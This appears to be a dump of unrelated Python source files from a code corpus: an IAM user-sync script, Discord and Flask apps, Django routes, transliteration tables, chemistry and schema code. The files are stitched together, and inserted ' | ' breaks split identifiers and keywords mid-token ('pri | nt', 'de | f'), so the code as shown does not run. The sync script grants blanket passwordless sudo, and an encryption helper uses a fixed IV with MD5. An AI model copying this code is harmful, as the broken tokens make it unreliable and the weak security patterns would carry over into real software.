:param user_pks: Mapping of username (``str``) to public keys (``list`` of
``str``) retrieved from IAM.
:type user_pks: dict
:param pwall: A list of ``pwd.struct_passwd`` including all password
entries found by NSS. Should include those users identified
by libnss-extrausers.
:type pwall: list
'''
username_index = dict(
(user.pw_name, user) for user in pwall if is_iam_user(user))
susername_index = dict(
(user[0], user) for user in | spwall
if user[0] in username_index)
uid_index = dict((int(user.pw_uid), user) for user in pwall)
next_uid = MIN_USER_UID
passwd, shadow, sudo = [], [], []
# Users that | have been removed from IAM will keep their UIDs around in the
# event that user IDs have. In practice, I don't anticipate this behavior
# to be problematic since there is an abundance of UIDs available in the
# default configuration UID range for all but the largest admin user pools.
for old_username in set(username_index.keys()) - set(user_pks.keys()):
passwd.append(username_index[old_username])
shadow.append(susername_index[old_username])
for username in user_pks.keys():
# Find the next gap in user IDs
while next_uid in uid_index:
next_uid += 1
if next_uid > MAX_USER_UID:
LOG.error("User limit reached! Skipping user %s", username)
break
sudo.append('{} ALL=(ALL) NOPASSWD:ALL'.format(username))
if username in username_index:
passwd.append(username_index[username])
shadow.append(susername_index[username])
else:
passwd.append(pwd.struct_passwd((
username,
'x',
next_uid,
next_uid,
'IAM-USER',
'/home/{}'.format(username),
'/bin/bash',
)))
shadow.append(spwd.struct_spwd((
username,
'*',
(datetime.datetime.utcnow() - EPOCH).days,
0,
99999,
7,
-1,
-1,
-1,
)))
next_uid += 1
sudo.sort()
sudo.insert(0, '# Created by {} on {}'.format(
__file__,
datetime.datetime.utcnow().ctime()))
return (
sorted(passwd_to_line(x) for x in passwd),
sorted(shadow_to_line(x) for x in shadow),
[x.encode('utf-8') for x in sudo]
)
def write(lines, target, permissions='0644'):
'''Write a sequence of byte strings to a file as individual lines.
This function first stages the file in a temporary directory.
'''
with tempfile.NamedTemporaryFile(delete=False) as staging:
for line in lines:
staging.write(line)
staging.write(b'\n')
subprocess.check_call(
('install' |
IIIIIIIIll/sdy_notes_liaoxf | LiaoXueFeng/as_IO/async_await.py | Python | gpl-3.0 | 325 | 0.006154 | import threading
import asyncio
async def hello():
print('Hello world! (%s)' % threading.currentThread())
await asyncio.sleep(1)
pri | nt('Hello again! (%s)' % threading.currentThread())
loop = asyncio.get_event_loop()
tasks = [hello(), hello()]
loop.run_until_complete(asyncio.wait(tasks))
loop.close() | |
selenized/clausius | clausius/eos/basicmixing.py | Python | unlicense | 877 | 0.003421 | import numpy as np
__all__ = ['vanDerWaalsMixing']
def vanDerWaalsMixing(kij=0):
"""Simple van der Waals mixing rules, returns a mixingrule function.
kij is an numpy array of binary interaction parameters"""
def vdw_mixing(molefraction, theta, TdthetadT, B, delta=None, epsilon=None, eta=None):
"""Takes molefraction, theta, T*dtheta/dT, B and returns mixed values
theta | _m, T*dtheta/dT_m, dtheta/dn, B_b, dB/dn"""
theta_ij = (1 - kij) * np.sqrt(np.outer(theta, theta))
dtheta_m = np.dot(molefraction, theta_ij)
B_m = np.dot(molefraction, B)
TdthetadT_ij = 0.5 * (1 - kij) * np.outer(theta, theta)**-0.5 * (np.outer(TdthetadT, theta) + np.outer(theta, TdthetadT,))
return np.dot(molefraction, dtheta_m), np.dot(molefraction, np.dot(TdthetadT_ij, molefraction)), | 2 * dtheta_m, B_m, B
return vdw_mixing
|
hazelcast-incubator/pyhzclient | hzclient/codec/transactionalmultimapcodec.py | Python | apache-2.0 | 1,449 | 0.024845 | __author__ = 'Jonathan Brodie'
import ctypes
from hzclient.clientmessage import ClientMessage
from util import util
'''
PUT
'''
de | f putEncode():
msg=ClientMessage()
msg.optype=0x1101
util.rais | eNotDefined()
def putDecode(bytesobject):
servermsg=ClientMessage.decodeMessage(bytesobject)
util.raiseNotDefined()
'''
GET
'''
def getEncode():
msg=ClientMessage()
msg.optype=0x1102
util.raiseNotDefined()
def getDecode(bytesobject):
servermsg=ClientMessage.decodeMessage(bytesobject)
util.raiseNotDefined()
'''
REMOVE
'''
def removeEncode():
msg=ClientMessage()
msg.optype=0x1103
util.raiseNotDefined()
def removeDecode(bytesobject):
servermsg=ClientMessage.decodeMessage(bytesobject)
util.raiseNotDefined()
'''
REMOVEENTRY
'''
def removeentryEncode():
msg=ClientMessage()
msg.optype=0x1104
util.raiseNotDefined()
def removeentryDecode(bytesobject):
servermsg=ClientMessage.decodeMessage(bytesobject)
util.raiseNotDefined()
'''
VALUECOUNT
'''
def valuecountEncode():
msg=ClientMessage()
msg.optype=0x1105
util.raiseNotDefined()
def valuecountDecode(bytesobject):
servermsg=ClientMessage.decodeMessage(bytesobject)
util.raiseNotDefined()
'''
SIZE
'''
def sizeEncode():
msg=ClientMessage()
msg.optype=0x1106
util.raiseNotDefined()
def sizeDecode(bytesobject):
servermsg=ClientMessage.decodeMessage(bytesobject)
util.raiseNotDefined() |
vladan-m/ggrc-core | src/ggrc/models/section_objective.py | Python | apache-2.0 | 1,173 | 0.01364 | # Copyright (C) 2013 Google Inc., authors, and contributors <see AUTHORS file>
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
# Created By: dan@reciprocitylabs.com
# Maintained By: dan@reciprocitylabs.com
from ggrc import db
from .mixins import | Mapping
class SectionObjective(Mapping, db.Model):
__tablename__ = 'section_objectives'
@staticmethod
def _extra_table_args(cls):
return (
db.UniqueConstraint('section_id', 'objective_id'),
db.Index('ix_section_id', 'section_id'),
db.Index('ix_objective_id', 'objective_id'),
)
section_id = db.Column(db.Integer, db.ForeignKey('sections.id'), nullable = False)
objective_id = db.Column(db.Integer, db.ForeignKey('objectives.id'), nullable = False)
_publish_a | ttrs = [
'section',
'objective',
]
@classmethod
def eager_query(cls):
from sqlalchemy import orm
query = super(SectionObjective, cls).eager_query()
return query.options(
orm.subqueryload('section'),
orm.subqueryload('objective'))
def _display_name(self):
return self.section.display_name + '<->' + self.objective.display_name
|
ministryofjustice/cla_backend | cla_backend/apps/reports/urls.py | Python | mit | 2,339 | 0.005558 | from django.conf.urls import patterns, url
from . import views
from . import api
urlpatterns = patterns(
"",
url(r"^api/exports/$", api.ExportListView.as_view(), name="exports"),
url(r"^api/exports/scheduled/$", api.ExportListView.as_view(scheduled=True), name="scheduled"),
url(r"^api/exports/(?P<pk>[0-9]+)/$", api.ExportListView.as_view(), name="exports"),
url(r"^exports/download/(?P<file_name>[A-Za-z0-9-_\.]+)$", views.download_file, name="exports"),
url(
r"^mi-provider-allocation-extract/$",
views.mi_provider_allocation_extract,
name="mi_provider_allocation_extract",
),
url(r"^mi-case-extract/$", views.mi_case_extract, name="mi_case_extract"),
url(
r"^mi-case-view-audit-log-extract/$",
views.mi_case_view_audit_log_extract,
name="mi_case_view_audit_log_extract", |
),
url(
r"^mi-complaint-view-audit-log-extract/$",
views.mi_complaint_view_audit_log_extract,
name="mi_complaint_view_audit_log_extract",
),
url(r"^mi-feedback-e | xtract/$", views.mi_feedback_extract, name="mi_feedback_extract"),
url(r"^mi-duplicate-case-extract/$", views.mi_duplicate_case_extract, name="mi_duplicate_case_extract"),
url(r"^mi-contacts-per-case-extract/$", views.mi_contacts_extract, name="mi_contacts_extract"),
url(r"^mi-alternative-help-extract/$", views.mi_alternative_help_extract, name="mi_alternative_help_extract"),
url(r"^mi-survey-extract/$", views.mi_survey_extract, name="mi_survey_extract"),
url(r"^mi-cb1-extract/$", views.mi_cb1_extract, name="mi_cb1_extract"),
url(r"^mi-cb1-extract-agilisys/$", views.mi_cb1_extract_agilisys, name="mi_cb1_extract_agilisys"),
url(r"^mi-voice-extract/$", views.mi_voice_extract, name="mi_voice_extract"),
url(r"^mi-digital-case-type-extract/$", views.mi_digital_case_type_extract, name="mi_digital_case_type_extract"),
url(r"^mi-eod-extract/$", views.mi_eod_extract, name="mi_eod_extract"),
url(r"^mi-comlpaints/$", views.mi_complaints, name="mi_complaints"),
url(r"^mi-obiee-extract/$", views.mi_obiee_extract, name="mi_obiee_extract"),
url(r"^metrics-report/$", views.metrics_report, name="metrics_report"),
url(r"^all-knowledgebase-articles/$", views.all_knowledgebase_articles, name="all_knowledgebase_articles"),
)
|
slice/dogbot | dog/ext/quoting/cog.py | Python | mit | 7,284 | 0.000412 | import datetime
import time
from random import choice
import discord
import lifesaver
from discord.ext import commands
from lifesaver.bot.storage import AsyncJSONStorage
from lifesaver.utils import (
ListPaginator,
clean_mentions,
human_delta,
pluralize,
truncate,
)
from .converters import Messages, QuoteName
from .utils import stringify_message
__all__ = ["Quoting"]
def embed_quote(quote) -> discord.Embed:
embed = discord.Embed()
embed.description = quote["content"]
embed.add_field(name="Jump", value=quote["jump_url"], inline=False)
creator = quote["created_by"]["tag"]
channel = quote["created_in"]["name"]
ago = human_delta(datetime.datetime.utcfromtimestamp(quote["created"]))
embed.set_footer(text=f"Created by {creator} in #{channel} {ago} ago")
return embed
class Quoting(lifesaver.Cog):
def __init__(self, bot, *args, **kwargs):
super().__init__(bot, *args, **kwargs)
self.storage = AsyncJSONStorage("quotes.json", loop=bot.loop)
def qu | otes(self, guild: discord.Guild):
return self.storage.get(str(guild.id), {})
@lifesaver.command(aliases=["rq"])
@commands.guild_only()
async def random_quote(self, ctx):
"""Shows a random quote."""
| quotes = self.quotes(ctx.guild)
if not quotes:
await ctx.send(
"There are no quotes in this server. Create some with "
f"`{ctx.prefix}quote new`. For more information, see `{ctx.prefix}"
"help quote`."
)
return
(name, quote) = choice(list(quotes.items()))
embed = embed_quote(quote)
name = clean_mentions(ctx.channel, name)
await ctx.send(name, embed=embed)
@lifesaver.group(aliases=["q"], invoke_without_command=True)
@commands.guild_only()
async def quote(self, ctx, *, name: QuoteName(must_exist=True)):
"""Views a quote.
Quotes are essentially pictures of multiple messages and stores them
in my database.
You can specify multiple message IDs to store:
d?quote new "my quote" 467753625024987136 467753572633673773 ...
Alternatively, you can specify a message ID then a number of messages
to store after that, like:
d?quote new "my quote" 467753625024987136+5
That would store message 467753625024987136 and the 5 messages after
that. You can also combine them if you would like to simultaneously
specify individual messages and groups of messages. Alternatively,
you can select the last 5 messages like so:
d?quote new "my quote" :-5
The :n or +n (called the "range") will grab up to 50 messages both ways.
Your quote's content has a length limit of 2048, Discord's embed
description limit. You will be prompted to confirm if your created
quote goes over this limit.
To read a quote, just specify its name, and no message IDs:
d?quote my quote
The number of embeds in any message (if any) and any attachment URLs
are preserved. Additionally, quotes contain a jump URL to jump to the
first message in the quote directly with your client.
If you want to create a quote without having the quote echo in chat,
prefix the quote name with "!":
d?quote !quote 467753625024987136+3
The bot will DM you the quote instead of echoing it in chat, and no
feedback will be provided in the channel. Keep in mind that the name of
the created quote will not have the "!".
Quotes contain the following data:
- All message content, all numbers of embeds, all attachment URLs
- Channel ID and name, first message ID, guild ID
- Creation timestamp
- Quote creator ID and username#discriminator
"""
quotes = self.quotes(ctx.guild)
quote = quotes.get(name)
embed = embed_quote(quote)
await ctx.send(embed=embed)
@quote.command(aliases=["new"])
@commands.guild_only()
async def create(
self, ctx, name: QuoteName(must_not_exist=True), *messages: Messages
):
"""Creates a quote.
See `d?help quote` for more information.
"""
quotes = self.quotes(ctx.guild)
silent = name.startswith("!")
if silent:
# Remove the !
name = name[1:]
# the converter can return multiple messages if a range is specified
quoted = []
for message in messages:
if isinstance(message, list):
quoted += message
else:
quoted.append(message)
strings = map(stringify_message, quoted)
quote_content = "\n".join(strings)
if len(quote_content) > 2048:
over_limit = pluralize(character=len(quote_content) - 2048)
if not await ctx.confirm(
"Quote is quite large...",
(
f"This quote is pretty big. ({over_limit} over limit.) "
"It will be truncated to 2048 characters. Continue?"
),
):
return
quote = quotes[name] = {
"content": truncate(quote_content, 2048),
"jump_url": quoted[0].jump_url,
"created": time.time(),
"created_by": {"id": ctx.author.id, "tag": str(ctx.author)},
"created_in": {"id": ctx.channel.id, "name": ctx.channel.name},
"guild": {"id": ctx.guild.id},
}
await self.storage.put(str(ctx.guild.id), quotes)
embed = embed_quote(quote)
await (ctx.author if silent else ctx).send(
f'Created quote "{name}".', embed=embed
)
@quote.command()
@commands.guild_only()
async def list(self, ctx):
"""Lists quotes on this server."""
quotes = self.quotes(ctx.guild)
if not quotes:
await ctx.send("No quotes exist for this server.")
return
tag_names = [clean_mentions(ctx.channel, name) for name in quotes.keys()]
paginator = ListPaginator(
tag_names,
ctx.author,
ctx.channel,
title="All quotes",
per_page=20,
bot=ctx.bot,
)
await paginator.create()
@quote.command()
@commands.guild_only()
@commands.has_permissions(manage_messages=True)
async def rename(
self,
ctx,
existing: QuoteName(must_exist=True),
new: QuoteName(must_not_exist=True),
):
"""Renames a quote."""
quotes = self.quotes(ctx.guild)
quotes[new] = quotes[existing]
del quotes[existing]
await self.storage.put(str(ctx.guild.id), quotes)
await ctx.send(f'Quote "{existing}" was renamed to "{new}".')
@quote.command()
@commands.guild_only()
@commands.has_permissions(manage_messages=True)
async def delete(self, ctx, *, quote: QuoteName(must_exist=True)):
"""Deletes a quote."""
quotes = self.quotes(ctx.guild)
del quotes[quote]
await self.storage.put(str(ctx.guild.id), quotes)
await ctx.ok()
|
SequencingDOTcom/App-Market-API-integration | python/external/sequencing/utils/connect.py | Python | mit | 1,174 | 0.005963 | import base64
import urllib
import hashlib
import json
from Crypto.Cipher import AES
from external.sequencing.config import SequencingEndpoints
class AESCipher:
def __init__(self, key, iv):
self.key = key[:32]
self.iv = iv[:16]
__pad = lambda self,s: s + (AES.block_size - len(s) % AES.block_siz | e) * chr(AES.block_size - len(s) % AES.block_size)
__unpad = lambda self,s: s[0:-ord(s[-1])]
def encrypt(self, raw):
raw = self.__pad(raw)
cipher = AES.new(self.key, AES.MODE_CBC, self.iv)
return base64.b64encode | (cipher.encrypt(raw))
def decrypt(self, enc):
enc = base64.b64decode(enc)
cipher = AES.new(self.key, AES.MODE_CBC, self.iv)
return self.__unpad(cipher.decrypt(enc).decode("utf-8"))
def get_connect_to_link(data , url=SequencingEndpoints.connect_to):
password = data['client_id'];
cipher = AESCipher(password, '3n3CrwwnzMqxOssv')
payload = json.dumps(data)
enc_str = cipher.encrypt(payload)
get_vars = {
'c': hashlib.md5(password).hexdigest(),
'json': urllib.quote(enc_str.encode('utf-8'))
}
return url + urllib.urlencode(get_vars)
|
shreevatsa/sanskrit | transliteration/transliterate.py | Python | gpl-2.0 | 8,647 | 0.008235 | # -*- coding: utf-8 -*-
"""Transliteration data."""
from __future__ import absolute_import, division, print_function, unicode_literals
try: unicode
except NameError: unicode = str
import slp1
from transliteration.detect import TRANSLITERATION_SCHEME
from transliteration import devanagari
from transliteration.transliteration_data import KANNADA_CONSONANTS
from transliteration import transliterator
_DEFAULT_PASS_THROUGH = ' -?'
def _AlphabetToSLP1(alphabet):
"""Table to SLP1, given a transliteration's alphabet in standard order."""
return dict(zip(alphabet, slp1.ALPHABET))
def _SLP1ToAlphabet(alphabet):
return dict(zip(slp1.ALPHABET, alphabet))
_HK_ALPHABET = (list('aAiIuUR') + ['RR', 'lR', 'lRR', 'e', 'ai', 'o', 'au'] +
['M', 'H',
'k', 'kh', 'g', 'gh', 'G',
'c', 'ch', 'j', 'jh', 'J',
'T', 'Th', 'D', 'Dh', 'N',
't', 'th', 'd', 'dh', 'n',
'p', 'ph', 'b', 'bh', 'm'] +
list('yrlvzSsh'))
_HK_TO_SLP1_STATE_MACHINE = transliterator.MakeStateMachine(
_AlphabetToSLP1(_HK_ALPHABET))
_IAST_ALPHABET_LOWER = (list('aāiīuūṛṝḷḹe') + ['ai', 'o', 'au', 'ṃ', 'ḥ'] +
['k', 'kh', 'g', 'gh', 'ṅ',
'c', 'ch', 'j', 'jh', 'ñ',
'ṭ', 'ṭh', 'ḍ', 'ḍh', 'ṇ',
't', 'th', 'd', 'dh', 'n',
'p', 'ph', 'b', 'bh', 'm',
'y', 'r', 'l', 'v', 'ś', 'ṣ', 's', 'h'])
_IAST_ALPHABET_UPPER = (list('AĀIĪUŪṚṜḶḸE') + ['AI', 'O', 'AU', 'Ṃ', 'Ḥ'] +
['K', 'Kh', 'G', 'Gh', 'Ṅ',
'C', 'Ch', 'J', 'Jh', 'Ñ',
'Ṭ', 'Ṭh', 'Ḍ', 'Ḍh', 'Ṇ',
'T', 'Th', 'D', 'Dh', 'N',
'P', 'Ph', 'B', 'Bh', 'M',
'Y', 'R', 'L', 'V', 'Ś', 'Ṣ', 'S', 'H'])
def _IASTToSLP1StateMachine():
"""Transliteration table from IAST to SLP1."""
lower = _AlphabetToSLP1(_IAST_ALPHABET_LOWER)
upper = _AlphabetToSLP1(_IAST_ALPHABET_UPPER)
lower.update(upper)
return transliterator.MakeStateMachine(lower)
_IAST_TO_SLP1_STATE_MACHINE = _IASTToSLP1Sta | teMachine()
_SLP1_TO_IAST_STATE_MACHINE = transliterator.MakeStateMachine(
_SLP1To | Alphabet(_IAST_ALPHABET_LOWER))
_ITRANS_ALPHABET = (['a', 'aa', 'i', 'ii', 'u', 'uu', 'RRi', 'RRI',
'LLi', 'LLI', 'e', 'ai', 'o', 'au', 'M', 'H',
'k', 'kh', 'g', 'gh', '~N',
'ch', 'Ch', 'j', 'jh', '~n',
'T', 'Th', 'D', 'Dh', 'N',
't', 'th', 'd', 'dh', 'n',
'p', 'ph', 'b', 'bh', 'm',
'y', 'r', 'l', 'v', 'sh', 'Sh', 's', 'h'])
def _ITRANSToSLP1StateMachine():
table = _AlphabetToSLP1(_ITRANS_ALPHABET)
alternatives = [('aa', 'A'), ('ii', 'I'), ('uu', 'U'), ('RRi', 'R^i'),
('RRI', 'R^I'), ('LLi', 'L^i'), ('LLI', 'L^I'),
('~N', 'N^'), ('~n', 'JN'), ('v', 'w')]
for (letter, alternative) in alternatives:
table[alternative] = table[letter]
return transliterator.MakeStateMachine(table)
_ITRANS_TO_SLP1_STATE_MACHINE = _ITRANSToSLP1StateMachine()
_MANGLED_DEVANAGARI_TO_SLP1_STATE_MACHINE = transliterator.MakeStateMachine(
_AlphabetToSLP1(devanagari.Alphabet()))
def _TransliterateDevanagari(text):
return transliterator.Transliterate(_MANGLED_DEVANAGARI_TO_SLP1_STATE_MACHINE,
devanagari.Mangle(text),
_DEFAULT_PASS_THROUGH)
def _IsoToIast(text):
text = text.replace('ṁ', 'ṃ')
text = text.replace('ē', 'e')
text = text.replace('ō', 'o')
text = text.replace('r̥̄', 'ṝ')
text = text.replace('r̥', 'ṛ')
text = text.replace('l̥̄', 'ḹ')
text = text.replace('l̥', 'ḷ')
return text
def _FixBadDevanagari(text):
# TODO(shreevatsa): Warn about these "wrong" characters.
text = text.replace('ऎ', 'ए')
text = text.replace('ऒ', 'ओ')
text = text.replace('ॆ', 'े')
text = text.replace('ॊ', 'ो')
text = text.replace('ळ', 'ल')
text = text.replace('ॐ', 'ओं')
text = text.replace(u'\u1CF2', 'ः') # VEDIC SIGN ARDHAVISARGA
text = text.replace(u'\u1CF3', 'ः') # VEDIC SIGN ROTATED ARDHAVISARGA
text = text.replace(u'\u1CF5', 'ः') # VEDIC SIGN JIHVAMULIYA
text = text.replace(u'\u1CF6', 'ः') # VEDIC SIGN UPADHMANIYA
return text
_KANNADA_VOWEL_SIGNS = 'ಕಾ ಕಿ ಕೀ ಕು ಕೂ ಕೃ ಕೄ ಕೆ ಕೇ ಕೈ ಕೊ ಕೋ ಕೌ ಕಂ ಕಃ ಕ್'
_KANNADA_VOWEL_SIGNS = ''.join(_KANNADA_VOWEL_SIGNS[i]
for i in range(len(_KANNADA_VOWEL_SIGNS))
if i % 3 == 1)
_DEVANAGARI_VOWEL_SIGNS = 'का कि की कु कू कृ कॄ कॆ के कै कॊ को कौ कं कः क्'
_DEVANAGARI_VOWEL_SIGNS = ''.join(_DEVANAGARI_VOWEL_SIGNS[i]
for i in range(len(_DEVANAGARI_VOWEL_SIGNS))
if i % 3 == 1)
_DEVANAGARI_CONSONANTS = 'कखगघङचछजझञटठडढणतथदधनपफबभमयरलवशषसहळरळ'
_KANNADA_VOWELS = 'ಅಆಇಈಉಊಋೠಎಏಐಒಓಔ'
_DEVANAGARI_VOWELS = 'अआइईउऊऋॠऎएऐऒओऔ'
_KANNADA_AV = 'ಅಂ ಅಃ'
_KANNADA_AV = ''.join(_KANNADA_AV[i]
for i in range(len(_KANNADA_AV)) if i % 3 == 1)
_DEVANAGARI_AV = 'अं अः'
_DEVANAGARI_AV = ''.join(_DEVANAGARI_AV[i]
for i in range(len(_DEVANAGARI_AV)) if i % 3 == 1)
_KANNADA_TO_DEVANAGARI = transliterator.MakeStateMachine(dict(zip(
_KANNADA_VOWELS + _KANNADA_AV + KANNADA_CONSONANTS + _KANNADA_VOWEL_SIGNS,
_DEVANAGARI_VOWELS + _DEVANAGARI_AV + _DEVANAGARI_CONSONANTS +
_DEVANAGARI_VOWEL_SIGNS)))
def KannadaToDevanagari(text):
return transliterator.Transliterate(_KANNADA_TO_DEVANAGARI, text,
pass_through=_DEFAULT_PASS_THROUGH)[0]
def TransliterateFrom(input_text, input_scheme, pass_through=None):
"""Transliterates text to SLP1, after being told what script it is."""
input_text = _IsoToIast(input_text)
def ForKannada(text):
text = KannadaToDevanagari(text)
text = _FixBadDevanagari(text)
text = text.replace('s', 'ऽ')
return _TransliterateDevanagari(text)
actions = {
TRANSLITERATION_SCHEME.Kannada: ForKannada,
TRANSLITERATION_SCHEME.Devanagari:
lambda text: _TransliterateDevanagari(text),
TRANSLITERATION_SCHEME.IAST:
lambda text: transliterator.Transliterate(_IAST_TO_SLP1_STATE_MACHINE, text, pass_through),
TRANSLITERATION_SCHEME.ITRANS:
lambda text: transliterator.Transliterate(_ITRANS_TO_SLP1_STATE_MACHINE, text, pass_through),
TRANSLITERATION_SCHEME.HK:
lambda text: transliterator.Transliterate(_HK_TO_SLP1_STATE_MACHINE, text, pass_through)}
return actions[input_scheme](input_text)
_SLP1_TO_MANGLED_DEVANAGARI_STATE_MACHINE = transliterator.MakeStateMachine(
_SLP1ToAlphabet(devanagari.Alphabet()))
def _CleanSLP1ToDevanagari(text):
(text, unparsed) = transliterator.Transliterate(_SLP1_TO_MANGLED_DEVANAGARI_STATE_MACHINE, text,
pass_through=_DEFAULT_PASS_THROUGH)
assert not unparsed, (text, unparsed)
assert isinstance(text, unicode), text
return devanagari.UnMangle(text)
def TransliterateForOutput(text):
iast = transliterator.Transliterate(_SLP1_TO_IAST_STATE_MACHINE, text,
pass_through=_DEFAULT_PASS_THROUGH)[0]
deva = _CleanSLP1ToDevanagari(text)
return '%s (%s)' % (iast, deva)
def AddDevanagariToIast(iast):
"""Given IAST text, include the Devanagari transliteration in brackets."""
stray = ' ()/' # Non-IAST characters that appear in metre names
slp_text = transliterator.Transliterate(_IAST_TO_SLP1_STATE_MACHINE, iast, pass_through=stray)[0]
(deva, unparsed) = transliterator.Transliterate(_SLP1_TO_MANGLED_DEVANAGARI_STATE_MACHINE,
slp_text, pass_through=stray)
assert not unparsed, (deva, unparsed)
assert isinstance(deva, unicode), deva
deva = devanagari.UnMangle(deva)
return '%s (%s)' % (iast, deva)
def TransliterateForTable(text):
return transliterator.Transliterate(_SLP1_TO_IAST_STATE_MACHINE, text,
|
Coderhypo/namiya | nayami/route/post.py | Python | apache-2.0 | 3,039 | 0.000329 | from flask import render_template, request, abort, redirect, url_for
from datetime import datetime
from nayami.common.app import app
from nayami.common.auth import user_auth
from nayami.model.post import Post
@app.route('/', methods=['GET'])
def index_page():
return render_template('index.html')
@app.route('/p/<post_id>', methods=['GET', 'POST'])
def get_post_page(post_id):
if request.method == 'GET':
return render_template('post/need_email.html', post_id=post_id)
email = request.form.get("email")
post = Post.get_post_by_id(post_id)
if not post or post.reply_email != email:
recipient = post.recipient if post else u'John Winston Lennon'
return render_template('post/need_email.html', post_id=post_id, recipient=recipient)
post.read()
return render_template('post/post.html', post=post)
@app.route('/post', methods=['GET', 'POST'])
@user_auth
def create_post_page():
if request.method == 'GET':
return render_template('post/create_post.html')
if request.method == 'POST':
content = request.form.get("content")
sender = request.form.get("sender")
sender_email = request.form.get("sender_email")
post = Post.create_post(sender, sender_email, content)
assert post.id
return redirect(url_for("mail_box_page"))
@app.route('/mailbox', methods=['GET'])
@user_auth
def mail_box_page():
posts = Post.get_all_unanswered_post()
return render_template('mailbox.html', posts=posts)
@app.route('/milkbox', methods=['GET'])
@user_auth
def milk_box_page():
posts = Post.get_all_replies()
return render_template('milkbox/list.html', posts=posts)
@app.route('/backdoor', methods=['GET', 'POST'])
@user_auth
def back_door_page():
now = datetime.now().hour
from nayami.config import TEST
if not TEST and 8 < now < 22:
return render_template('backdoor/help.html')
if request.method == 'GET':
need = request.args.get('need')
if need == 'true':
post = Post.get_rand_unanswered_post()
if post:
return render_template('backdoor/reply_post.html', post=post)
post_id = request.args.get("p")
post = Post.get_post_by_id(post_id) if post_id else None
if post and not post.from_namiya:
post.read() |
return render_template('backdoor/reply_post.html', post=post)
posts = Post.get_all_unanswered_post()
return render_template('backdoor/list.html', posts=posts)
if request.method == 'POST':
| post_id = request.form.get("post_id")
content = request.form.get("content")
sender_email = request.form.get("sender_email")
post = Post.get_post_by_id(post_id)
if post:
post.reply(sender_email, content)
return redirect(url_for("back_door_page"))
@app.route('/<page_name>', methods=['GET'])
def other_page(page_name):
if page_name in ['help']:
return render_template('page/%s.html' % page_name)
abort(404)
|
zomux/deepy | deepy/layers/softmax3d.py | Python | mit | 409 | 0.00489 | # | !/usr/bin/env python
# -*- coding: utf-8 -*-
from layer import NeuralLayer
import theano
import theano.tensor as T
class Softmax3D(NeuralLayer):
def __init__(self):
super(Softmax3D, self).__init__("softmax")
def compute_tensor(self, x):
shape = x.shape
x = x.reshape((-1, shape[-1]))
softmax_tensor = T.nnet.softmax(x)
return softmax_tenso | r.reshape(shape) |
MD-Studio/MDStudio | mdstudio/mdstudio/api/schema.py | Python | apache-2.0 | 9,728 | 0.002673 | import json
import jsonschema
import os
import re
import six
from jsonschema import FormatChecker, Draft4Validator
from mdstudio.api.exception import RegisterException
from mdstudio.api.singleton import Singleton
from mdstudio.deferred.chainable import chainable
from mdstudio.deferred.return_value import return_value
# python 2 compat
try:
FileNotFoundError
except NameError:
FileNotFoundError = IOError
class ISchema(object):
def __init__(self):
self.cached = {}
def _retrieve_local(self, base_path, schema_path, versions=None):
if versions is not None:
if not isinstance(versions, (list, set)):
versions = [versions]
for version in versions:
path = os.path.join(base_path, '{}.v{}.json'.format(schema_path, version))
with open(path, 'r') as f:
self.cached[version] = json.load(f)
else:
path = os.path.join(base_path, '{}.json'.format(schema_path))
with open(path, 'r') as f:
self.cached[1] = json.load(f)
@chainable
def _recurse_subschemas(self, schema, session):
success = True
if isinstance(schema, dict):
ref = schema.pop('$ref', None)
if ref:
ref_decomposition = re.match(r'(\w+)://(.+)', ref)
if not ref_decomposition:
raise RegisterException('$ref value in the schema must hold a valid resource uri. This may be given as '
'resource://<uri>, endpoint://<uri>, or https://<url>, you specified "{}"'.format(ref))
subschema = self._schema_factory(ref_decomposition.group(1), ref_decomposition.group(2))
if (yield subschema.flatten(session)):
schema.update(subschema.to_schema())
else:
success = False
if success:
for k, v in schema.items():
recursed = yield self._recurse_subschemas(v, session)
if not recursed['success']:
success = False
break
schema[k] = recursed['schema']
elif isinstance(schema, list):
for v in schema:
success = success and (yield self._recurse_subschemas(v, session))['success']
return_value({
'schema': schema,
'success': success
})
@staticmethod
def _schema_factory(schema_type, schema_path):
factory_dict = {
'resource': ResourceSchema,
'mdstudio': MDStudioSchema,
'endpoint': EndpointSchema,
'https': HttpsSchema,
'http': HttpsSchema
}
if schema_type not in factory_dict:
raise RegisterException('You tried to specify an unknown schema type. '
'Valid schemas are resource://<uri>, endpoint://<uri> and https://<url>. '
'We got "{}" as schema type'.format(schema_type))
return factory_dict[schema_type](schema_path)
def to_schema(self):
if not self.cached:
raise NotImplementedError("This schema has not been or could not be retrieved.")
if len(self.cached) > 1:
return {
'oneOf': list(self.cached.values())
}
else:
return six.next(six.itervalues(self.cached))
class InlineSchema(ISchema):
def __init__(self, schema):
super(InlineSchema, self).__init__()
self.schema = schema
def flatten(self, session=None):
return self._recurse_subschemas(self.schema, session)
def to_schema(self):
return self.schema
class HttpsSchema(ISchema):
def __init__(self, uri):
super(HttpsSchema, self).__init__()
self.uri = 'https://{}'.format(uri)
def flatten(self, session=None):
return True
def to_schema(self):
return {'$ref': self.uri}
class EndpointSchema(ISchema):
type_name = 'endpoint'
def __init__(self, uri, versions=None):
super(EndpointSchema, self).__init__()
uri_decomposition = re.match(r'([\w/\-_]+?)(/((v?\d+,?)*))?$', uri)
if not uri_decomposition:
raise RegisterException('An {0} schema uri must be in the form "{0}://<schema path>(/v<versions>), '
'where <versions> is a comma separated list of version numbers. Only alphanumberic, and "/_-"'
' characters are supported. We got "endpoint://{1}".'.format(self.type_name, uri))
self.schema_path = uri_decomposition.group(1)
uri_versions = uri_decomposition.group(3)
self.versions = versions or ([int(v) for v in uri_versions.replace('v', '').split(',')] if uri_versions else [1])
self.schema_subdir = 'endpoints'
@chainable
def flatten(self, session=None):
# type: (CommonSession) -> bool
if self.cached:
return_value(True)
ldir = self.search_dir(session)
if self.schema_subdir:
ldir = os.path.join(ldir, self.schema_subdir)
try:
self._retrieve_local(ldir, self.schema_path, self.versions)
except IOError as ex:
raise RegisterException('Tried to access schema "{}/{}" with versions {}, '
'but the schema was not found:\n{}'.format(ldir, self.schema_path, self.versions, str(ex)))
success = True
for version, schema in self.cached.items():
flattened = yield self._recurse_subschemas(schema, session)
self.cached[version] = flattened['schema']
if not flattened['success']:
success = False
break
if not success:
self.cached = {}
return_value(success)
def search_dir(self, session):
return session.component_schemas_path()
class MDStudioSchema(EndpointSchema):
schema_subdir = None
type_name = 'mdstudio'
class ClaimSchema(EndpointSchema):
type_name = 'claims'
def __init__(self, uri, versions=None):
super(ClaimSchema, self).__init__(uri, versions)
self.schema_subdir = 'claims'
